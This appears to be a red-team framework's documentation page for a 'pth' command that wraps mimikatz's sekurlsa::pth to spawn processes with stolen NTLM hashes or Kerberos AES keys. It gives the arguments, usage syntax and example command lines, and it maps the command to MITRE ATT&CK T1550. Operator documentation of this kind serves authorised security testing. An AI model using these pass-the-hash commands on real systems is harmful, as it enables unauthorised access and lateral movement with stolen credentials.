Skip to main content
Artifacts Generated: Process Create, Process Inject, Process Kill

Summary

Use mimikatz’s sekurlsa::pth module to spawn a new process with a user’s Kerberos keys.

Arguments

Domain

Domain that the specified user is part of.

User

Username for which you’ve obtained credential material for.

NTLM

NTLM password hash of the specified user.

AES128 (Optional)

The AES128 key of the user. Used for over pass the hash.

AES256 (Optional)

The AES256 key of the user. Used for over pass the hash.

Run (Optional)

Program to spawn using alternate credentials. Default: cmd.exe.
When choosing a program to spawn, consider whether or not you need the process to be long-lived. A process that spawns and exits immediately will not be a good candidate to perform steal_token against, for example, as the process will no longer exist when attempting to impersonate the credential material.

Usage

pth -Domain [domain.local] -User [username] -NTLM [ntlm_hash_val] [-AES128 [aes_128_val] -AES256 [aes_256_val] -Run [cmd.exe]]
Example 
pth -Domain contoso.local -User djhohnstein -NTLM 21BC7DCD88EE195ECF3728677A47815B
pth -Domain contoso.local -User djhohnstein -NTLM 21BC7DCD88EE195ECF3728677A47815B -Run powershell.exe

MITRE ATT&CK Mapping

  • T1550

Resrouces